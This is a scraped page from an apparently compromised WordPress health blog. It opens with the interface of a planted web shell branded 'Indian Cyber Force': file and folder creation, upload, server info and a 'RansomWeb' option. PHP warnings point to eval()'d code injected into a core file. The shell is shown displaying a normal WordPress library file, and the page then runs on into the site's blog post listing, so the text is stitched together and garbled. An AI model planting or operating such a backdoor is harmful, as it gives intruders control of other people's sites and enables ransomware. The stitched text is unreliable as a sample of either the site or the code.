Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wordpress/wp-includes/IXR/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wordpress/wp-includes/IXR/class-IXR-clientmulticall.php
<?php
/**
 * IXR_ClientMulticall
 *
 * @package IXR
 * @since 1.5.0
 */
class IXR_ClientMulticall extends IXR_Client
{
    var $calls = array();

	/**
	 * PHP5 constructor.
	 */
    function __construct( $server, $path = false, $port = 80 )
    {
        parent::IXR_Client($server, $path, $port);
        $this->useragent = 'The Incutio XML-RPC PHP Library (multicall client)';
    }

	/**
	 * PHP4 constructor.
	 */
	public function IXR_ClientMulticall( $server, $path = false, $port = 80 ) {
		self::__construct( $server, $path, $port );
	}

	/**
	 * @since 1.5.0
	 * @since 5.5.0 Formalized the existing `...$args` parameter by adding it
	 *              to the function signature.
	 */
    function addCall( ...$args )
    {
        $methodName = array_shift($args);
        $struct = array(
            'methodName' => $methodName,
            'params' => $args
        );
        $this->calls[] = $struct;
    }

	/**
	 * @since 1.5.0
	 * @since 5.5.0 Formalized the existing `...$args` parameter by adding it
	 *              to the function signature.
	 *
	 * @return bool
	 */
    function query( ...$args )
    {
        // Prepare multicall, then call the parent::query() method
        return parent::query('system.multicall', $this->calls);
    }
}
wellwisehub – Page 4 Skip to content
wellwisehub

Latest Articles

  • Blog

    Evaluating the Value of a Professional Intervention

  • Blog

    “Embracing a Healthy Lifestyle: A Student’s Perspective”

  • Blog

    Comprehensive Guide to Postpartum Care Following Vaginal Birth

  • Blog

    4 Effective Strategies for Enhancing Workplace Safety with Safety Goggles

  • Blog

    Evaluating the Effectiveness of PEMF Therapy in Autism Spectrum Disorder Management

  • Blog

    Analyzing the Root Causes of Drug and Alcohol Addiction

  • Blog

    Essential Advice for Nurturing Your Hands and Feet

  • Blog

    Comparing Bali Kratom vs. Maeng Da: 6 Key Distinctions to Know

  • Blog

    Prolong Your Life with Products and Lifestyle Enhancements

  • Blog

    Effective Strategies to Help You Save Money on Medication

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes